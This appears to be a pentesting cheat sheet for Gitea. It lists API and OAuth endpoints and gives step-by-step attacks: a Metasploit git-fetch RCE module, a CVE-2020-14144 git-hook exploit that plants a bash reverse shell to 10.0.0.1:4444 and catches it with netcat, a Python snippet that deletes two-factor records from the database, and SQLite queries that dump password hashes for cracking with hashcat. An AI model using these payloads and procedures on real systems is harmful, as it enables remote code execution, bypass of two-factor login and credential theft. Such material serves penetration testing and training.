Gitea Pentesting
Last modified: 2025-04-03
Gitea is a forge software package for hosting software development version control using Git.
Common Directories
/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users
# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
Investigation
Source Code in Repositories
If we can access to repositories, we might be able to find sensitive information e.g. credentials, subdomains, other domains, secret keys, etc.
So check the source code.
Go Back to Previous Commits
We can see the source code of previous commits and find sensitive information accidentally disclosed by committers.
Get Secrets in Web Hooks
In the existing repository, we may find the secret value in the repository → Settings → Web Hooks.
Find User Credentials
If we have access to the target system and the repository, that is pushed in Gitea, exists in the system, we might be able to find the credential.
cd /path/to/gitea/repo
git config -l
Git Fetch Remote Code Execution (RCE)
Metasploit
msfconsole
msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run
Git Hooks Remote Code Execution (RCE)
CVE-2020-14144
It affects Gitea version from 1.1.0 to 1.13.
1. Login
Access to the Gitea dashboard and login as the existing account.
2. Create a New Repository
3. Go to the Repository’s Settings
In the new repository we’ve created, go to Settings → Git Hooks → post-receive.
4. Update to the Reverse Shell Payload
In the post-receive edit page, inject the payload as below:
#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444
5. Start Listener in Terminal
To receive the outcoming connection of the git hook, start listener.
nc -lvnp 4444
6. Create the New Repository in Terminal
mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master
After pushing, git hook triggered and execute the reverse shell command.
Now we should get a shell.
Swagger API
We can access to /api/swagger to interact with Swagger API.
Get New Token & Authorize
We need a token to use Swagger API.
- Register a new account in Gitea top page.
- Go to
/user/settings/applicationsand generate a new token. - Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
- Go to
/api/swagger. - Click “Authorize” button. The modal window opens.
- Paste the token in the “Token” section.
Delete the Two-Factor
victim@machine:/gitea/gitea$ python3
>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()
Dump Credentials in Database
Reference: Cracking Gitea's PBKDF2 Password Hashes
Gitea has the database file so we can find user hashes from this file.
# 1. Open it with `sqlite3`
sqlite3 /path/to/gitea/data/gitea.db
# 2. Retrieve credentials from the `user` table
sqlite> select email,salt,passwd,passwd_hash_algo from user;
Once the hashes found, we can crack them using gitea2hashcat.
# Paste the hashes (salt|passwd only) of the result above
python3 gitea2hashcat.py '<salt>|<passwd>'
Copy the output and crack it with Hashcat:
# the `-m 1900` may change depending on the hash algorithm.
hashcat -m 10900 '<hash>' wordlist.txt